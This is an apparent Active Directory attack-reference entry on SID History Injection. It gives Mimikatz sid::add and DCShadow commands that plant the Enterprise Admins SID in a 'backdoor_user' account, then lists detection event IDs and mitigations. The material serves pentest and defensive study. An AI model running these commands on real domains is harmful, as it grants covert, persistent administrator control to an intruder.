attack-63-sid-history-injection.md (3066B)
1 --- 2 title: "Attack #63 β SID History Injection" 3 description: "sIDHistory is an AD attribute designed for domain migrations β it preserves a user's old SID so they retain access to resources from a previous domain. Anβ¦" 4 category: active-directory 5 subcategory: "Persistence" 6 tags: ["active-directory", "privilege-escalation"] 7 tools: ["Mimikatz", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Eight/π€ Attack #63 β SID History Injection.md" 11 --- 12 # π€ Attack #63 β SID History Injection 13 14 *** 15 16 ## π How It Works 17 18 `sIDHistory` is an AD attribute designed for domain migrations β it preserves a user's old SID so they retain access to resources from a previous domain. An attacker can **inject the SID of a privileged group** (e.g., Enterprise Admins, SID `S-1-5-21-<domain>-519`) into a normal user's `sIDHistory`, granting them those privileges without actually being a member of the group. 19 20 This is typically done via Mimikatz `sid::add` or DCShadow. 21 22 *** 23 24 ## βοΈ Prerequisites 25 26 | Requirement | Detail | 27 |---|---| 28 | **Domain Admin / SYSTEM on DC** | Required to modify sIDHistory | 29 | **Or DCShadow capability** | Alternative injection method | 30 31 *** 32 33 ## π» Full Commands 34 35 ```powershell 36 # ββ Mimikatz β inject Enterprise Admin SID into user's SID History βββββββββββ 37 mimikatz.exe 38 privilege::debug 39 sid::patch 40 sid::add /sam:backdoor_user /new:S-1-5-21-<domain_SID>-519 41 # 519 = Enterprise Admins 42 # 512 = Domain Admins 43 # 500 = Administrator RID 44 45 # ββ Verify ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 46 Get-ADUser backdoor_user -Properties sIDHistory | Select sIDHistory 47 48 # ββ DCShadow method (stealthier) ββββββββββββββββββββββββββββββββββββββββββββββ 49 # Terminal 1 (SYSTEM): lsadump::dcshadow /object:backdoor_user /attribute:sidHistory /value:S-1-5-21-...-519 50 # Terminal 2 (DA): lsadump::dcshadow /push 51 ``` 52 53 *** 54 55 ## π‘οΈ Detection β Event IDs 56 57 | Event ID | Source | What to Look For | 58 |---|---|---| 59 | **4765** | Security Log (DC) | SID History was added to an account | 60 | **4766** | Security Log (DC) | SID History add attempt failed | 61 | **4738** | Security Log (DC) | User account changed β sIDHistory modified | 62 63 **Detection tip:** Query for users with `sIDHistory` populated: `Get-ADUser -Filter {sIDHistory -like "*"} -Properties sIDHistory` 64 65 *** 66 67 ## π Attack Chain Context 68 69 ``` 70 [SID History] βββ Invisible Privilege Escalation via SID Injection 71 β 72 ββββ π User appears normal but has hidden EA/DA privileges 73 ββββ π Used for: cross-domain trust abuse (#68), persistence 74 ββββ π Defeated by: audit sIDHistory, SID filtering on trusts, monitor 4765 75 ``` 76 77 *** 78 79 > β **Attack #63 β SID History Injection complete.**